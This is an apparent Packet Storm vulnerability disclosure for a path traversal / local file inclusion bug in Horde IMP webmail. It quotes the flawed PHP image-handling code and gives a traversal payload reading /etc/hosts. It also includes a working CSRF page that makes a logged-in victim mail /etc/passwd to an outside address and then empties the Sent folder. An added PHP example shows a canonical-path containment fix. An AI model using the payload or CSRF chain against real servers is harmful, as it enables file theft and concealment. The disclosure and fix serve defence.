📄 Horde Groupware IMP Webmail Path Traversal / Local File Inclusion

🗓️ 03 Jul 2026 00:00:00 | Reported by Evan from Evan.lat | Type: packetstorm | 🔗 packetstorm.news

Horde Groupware IMP Webmail has a path traversal local file inclusion flaw that may bypass authentication.

Code
this is my first time sending to a mailing list so I've chosen
    something easy. here goes:
    
    Summary: Horde Groupware’s IMP Webmail solution contains a path
    traversal/local file inclusion vulnerability which could be exploited
    to escalate privileges or bypass authentication (through CSRF if
    unauthenticated).
    
    the vulnerability is in here:
    
    } elseif (strcasecmp($node->tagName, 'IMG') === 0) {
                    /* Check for smileys. They live in the JS directory, under
                     * the base ckeditor directory, so search for that and replace
                     * with the filesystem information if found (Request
                     * #13051). Need to ignore other image links that may have
                     * been explicitly added by the user. */
                    $js_path = strval(Horde::url($registry->get('jsuri', 'horde'), true));
                    if (stripos($src, $js_path . '/ckeditor') === 0) {
                        $file = str_replace(
                            $js_path,
                            $registry->get('jsfs', 'horde'),
                            $src
                        );
    
                        if (is_readable($file)) {
                            $data_part = new Horde_Mime_Part();
                            $data_part->setContents(file_get_contents($file));
                          ...
    
    as seen, we control $file, which is just the src in <img src="">. to
    get past the checks to hit our file_get_contents sink, we can just
    satisfy the stripos check. our (elementary) exploit is thus:
    --
    <img src="https://webmail.foo.com/js/ckeditor/../../../../../../etc/hosts">
    --
    this is likely very chainable with any other existing primitive to
    achieve rce on horde IMP. for example, here's an easy csrf chain:
    
    --
    <!DOCTYPE html>
    <html>
    
    <body>
        <h1>yo</h1>
        <script>
            var p1 = new FormData();
            p1.append('to', '[email protected]');
            // land in spam
            p1.append('subject', 'hai');
            p1.append('html', '1');
            p1.append('message',
                '<html><body>bye<img src="http://targ/horde/js/ckeditor/../../../../etc/passwd"></body></html>');
    
            p1.append('identity', '0');
            p1.append('priority', 'normal');
            p1.append('request_read_receipt', '0');
            p1.append('save_sent_mail', '1');
            fetch('http://targ/horde/services/ajax.php/imp/sendMessage', {
                    method: 'POST',
                    body: p1,
                    credentials: 'include',
                    mode: 'no-cors'
                })
                .then(() => {
                    console.log("* bye");
                    setTimeout(() => {
                        var p2 = new FormData();
                        p2.append('mbox', 'U0VOVA'); // b64 SENT
                        // delete
                        fetch('http://targ/horde/services/ajax.php/imp/emptyMailbox', {
                            method: 'POST',
                            body: p2,
                            credentials: 'include',
                            mode: 'no-cors'
                        });
                    }, 2000);
                });
        </script>
    </body>
    
    </html>
    --
    
    PATCH:
    update to horde imp 7.0.1 for the patch.
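
The containment check that the quoted snippet lacks, as an added example (not Horde's code and not the 7.0.1 patch): the mapped path is canonicalised with `realpath()` and must stay under the ckeditor directory before anything reads it. The function name `resolve_editor_image`, the `webmail.example` URL and the temp-directory layout are assumptions constructed for the demo.

```php
<?php
// Added example, not Horde code. $jsUrl and $jsFs stand in for the 'jsuri'
// and 'jsfs' registry values; every path and URL below is constructed.

/** Map an editor <img src> to a file, or null if it leaves ckeditor/. */
function resolve_editor_image(string $src, string $jsUrl, string $jsFs): ?string
{
    $prefix = rtrim($jsUrl, '/') . '/ckeditor/';
    if (stripos($src, $prefix) !== 0) {
        return null;                       // not an editor asset
    }
    $rel = substr($src, strlen($prefix));
    $rel = substr($rel, 0, strcspn($rel, '?#'));   // drop query and fragment
    $rel = rawurldecode($rel);             // so %2e%2e cannot hide "../"
    if ($rel === '' || strpos($rel, "\0") !== false) {
        return null;
    }
    $base = realpath($jsFs . '/ckeditor');
    if ($base === false) {
        return null;
    }
    // realpath() collapses "../" and symlinks; false means no such file.
    $file = realpath($base . DIRECTORY_SEPARATOR . $rel);
    // Compare canonical paths, with a trailing separator so a sibling such
    // as "ckeditor-old" does not pass as "ckeditor".
    $root = $base . DIRECTORY_SEPARATOR;
    if ($file === false || strncmp($file, $root, strlen($root)) !== 0) {
        return null;
    }
    return is_file($file) ? $file : null;
}

// Constructed demo tree: one real smiley, one file outside the JS directory.
$tmp = sys_get_temp_dir() . '/imp_demo_' . getmypid();
mkdir("$tmp/js/ckeditor/smileys", 0700, true);
file_put_contents("$tmp/js/ckeditor/smileys/wink.png", 'png');
file_put_contents("$tmp/secret.txt", 'outside');
$url = 'https://webmail.example/js';
$samples = [
    "$url/ckeditor/smileys/wink.png",
    "$url/ckeditor/../../secret.txt",
    "$url/ckeditor/%2e%2e/%2e%2e/secret.txt",
];
foreach ($samples as $src) {
    $hit = resolve_editor_image($src, $url, "$tmp/js");
    printf("%-45s %s\n", substr($src, strlen($url)), $hit ? 'accepted' : 'rejected');
}
```

The original `stripos` test only proves the string starts with the ckeditor URL; the decision has to be made on the canonical filesystem path instead.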

Vulners AI Score: 5.9 (Medium risk)